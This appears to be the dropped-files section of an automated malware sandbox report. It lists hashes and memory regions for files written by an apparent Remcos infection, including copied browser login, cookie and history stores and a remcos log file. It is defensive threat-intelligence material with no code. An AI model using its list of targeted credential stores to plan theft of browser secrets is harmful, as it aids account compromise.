C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_drhfupmx.e1p.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3272-15-0x00007FFF703D0000-0x00007FFF70E91000-memory.dmp

memory/3272-16-0x00007FFF703D0000-0x00007FFF70E91000-memory.dmp

memory/3272-19-0x00007FFF703D3000-0x00007FFF703D5000-memory.dmp

memory/3272-20-0x00007FFF703D0000-0x00007FFF70E91000-memory.dmp

memory/3272-21-0x00007FFF703D0000-0x00007FFF70E91000-memory.dmp

memory/3272-24-0x00007FFF703D0000-0x00007FFF70E91000-memory.dmp

memory/3224-25-0x00000000024B0000-0x00000000024E6000-memory.dmp

memory/3224-26-0x0000000005160000-0x0000000005788000-memory.dmp

memory/3224-27-0x0000000004F10000-0x0000000004F32000-memory.dmp

memory/3224-28-0x0000000004FB0000-0x0000000005016000-memory.dmp

memory/3224-29-0x00000000050D0000-0x0000000005136000-memory.dmp

memory/3224-39-0x00000000057D0000-0x0000000005B24000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d4ff23c124ae23955d34ae2a7306099a
SHA1 b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA256 1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512 f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

memory/3224-41-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

memory/3224-42-0x0000000005DF0000-0x0000000005E3C000-memory.dmp

memory/3224-43-0x00000000077F0000-0x0000000007E6A000-memory.dmp

memory/3224-44-0x0000000006370000-0x000000000638A000-memory.dmp

memory/3224-45-0x0000000006E70000-0x0000000006F06000-memory.dmp

memory/3224-46-0x0000000006DD0000-0x0000000006DF2000-memory.dmp

memory/3224-47-0x0000000007E70000-0x0000000008414000-memory.dmp

C:\Users\Admin\AppData\Roaming\Finansieringsreglen.Obj

MD5 1cb290450b721be996587879d8a83c58
SHA1 86e9f667b6f6f4fc5516c81c6962e81056ae15e8
SHA256 4120967e3a52f6437b605b5aa39961ca6d5a0e49572357f71efad30727a65323
SHA512 e900d8a7fe53559e5c292997f8ab82d77a86b295a195a92ef9ffd4e9418b6733d7fc74394d473bea5d17383d8f0ce1749252a25b2e59f45a2b39a50db7d8521a

memory/3224-49-0x0000000008420000-0x000000000C878000-memory.dmp

memory/3016-62-0x00000000009D0000-0x0000000001C24000-memory.dmp

memory/3016-63-0x00000000009D0000-0x0000000001C24000-memory.dmp

memory/3016-68-0x0000000021C70000-0x0000000021CA4000-memory.dmp

memory/3016-72-0x0000000021C70000-0x0000000021CA4000-memory.dmp

memory/3016-71-0x0000000021C70000-0x0000000021CA4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 7bfd9ad3882ea68c19db777efec8d922
SHA1 fd3930a00919c526c976733fb1146656820e4108
SHA256 43489a3223a4af61a9ecff862958d31a81f395dbb6a4852d6c0687abab4618c5
SHA512 39f129bffdeb5aab2510b931d6b0f86b5b01d33c34d1a6bb79052f22f7adfe3767aec3085b43247109d771cf95ac0c346dfdd98c3a2bacff424a4acc4cd4b8eb

memory/1896-81-0x0000000000400000-0x0000000000462000-memory.dmp

memory/916-80-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2372-93-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1896-92-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2372-91-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1896-90-0x0000000000400000-0x0000000000462000-memory.dmp

memory/916-86-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2372-85-0x0000000000400000-0x0000000000424000-memory.dmp

memory/916-84-0x0000000000400000-0x0000000000478000-memory.dmp

memory/916-82-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 dde4555bdf5ade5a50e4e213061aec8e
SHA1 fea52c1ac82b0822021551dd87ca5b671b0dcc3b
SHA256 d3afee736c6e6461df00a7f00e1489e9bc9c0d944b3457a49c952dc0bc72ce2f
SHA512 2fda7e265ce18b052efa3046374aa0c2cd45ffc632ba1534ded402dffcbbc2fd9aacebc5954e7845b286127e550f0745c18d303506ca40e9a1e02c791b22daa8

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

MD5 08059ee8303ab21faaa79215f34845e1
SHA1 26d025aa21a961f2f92e6cea5a74424e7376132f
SHA256 d429f097c26c3c28a871f5dae3cb098506a873f92c5f994b1782b4f6839ea650
SHA512 3e67b19da65a213c66f933dfcf135c57840698da6b3d9c4ff1e339af0aa291cfabd7c34d9d20aceae1adb7f1b4d10b93faa25c1d5d3025f884887f982297ed63

\??\pipe\crashpad_2124_IZAUJYKPOXHTRMKE

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

memory/3016-201-0x00000000226B0000-0x00000000226C9000-memory.dmp

memory/3016-200-0x00000000226B0000-0x00000000226C9000-memory.dmp

memory/3016-197-0x00000000226B0000-0x00000000226C9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jdwblvahxqurzoaz

MD5 57509a6a6267f17bef5e5da8b1df8829
SHA1 0886741be12c4e6dd24688df7b9568e91b2fc2aa
SHA256 4d50e4b2ee7b25d6a88dea6a28503975ca95f98e6e72fcd1ee754d016df3ed3d
SHA512 019c20a2354ef20ff3870ea4d544ae4e7ec21729bfbeb19d2dd2f8b087fcb6b83f259ab2f35e0f3c7f044ebb7c5bbfdfc63f23b811d458a15f5ad35aa9175228

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/3016-223-0x00000000009D0000-0x0000000001C24000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 d1a3973b9b205a5539a8b9499eca3c7d
SHA1 cd77ca71384dc8b5ba06fe8d66d8e581d0536b97
SHA256 c719f4c4af416e250a19facf53cd28fe92a367bc775aa5d53e8c0f9d38ad96ee
SHA512 f9dbf1d66e963d05bbafa951555d67971fa219dfadb506668c02130d5f7fea3ae34351e88bbe0890cf3b7cb11114b8489b8555b81db0dff499d522d9e9d25241

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 6c91de91b3c28cc5955b6fec3215c133
SHA1 687e9f3c63837f8700ebe056544464028dee75a9
SHA256 159e619c9a28b7bef0c7bc649710cf08d8d4830317ec53926bfedb1324e5060f
SHA512 d538cac77b3ea996edc25d0e81ea226af481919f05c3cccd90ec2a9bfea524d860bd6aef66e43855d64f51a799a62b5fc826abf857b83d96af7ef1d990943bbe

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 a784e05cd5fbc1ebed2464f18abdc063
SHA1 306cf4bbf43d2bf944c427eb59f04ed4d38492c8
SHA256 f6c27a9e3e50b4acd1bbf7b05995965a0ab20f4aace4ba727e4eec7dacef4504
SHA512 6b0141b659fdd1b53a503e8bbf0f80eaacaaff4b7f7e72344a1c757cf4964dd61c51b8816bc7d876353e8e975f2b9f061de8ea02703ba4ea19292ac3801fd632

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 5e4f67f228100f640bb80959a7724a2e
SHA1 230b41e1816e1161eb87609362a928575f88edd4
SHA256 ddfe800f6e0e1426402dca5643d9c228562c293faedb86e0ce260e5b355a6f93
SHA512 d49e25506816488edf38b6f462dc9f72a51e88f96771251d4b16fa7da78b369d181e47daa126ec5f8dedeed4f84109f8af40a512fa316f3102f119d9c8cf46f4

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

MD5 f01d5b795f5ccb5721875ab844de7a85
SHA1 0abea62f45fb4a3c864bf9be2fc836075dbf29d2
SHA256 2f1e3d352b9bd89e315ddf80e5a89522e4af3dd96cdf649e79de4721959cf2db
SHA512 b733afd394e454a078a4be02c19636f36d4f1e458e4840254f1664d0c838b7a52962ab4ac2acef79523f543a261699bc317f1dbb5e2f727fb9b6b30629aa9cda

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

memory/3016-361-0x00000000009D0000-0x0000000001C24000-memory.dmp

C:\ProgramData\remcos\logs.dat
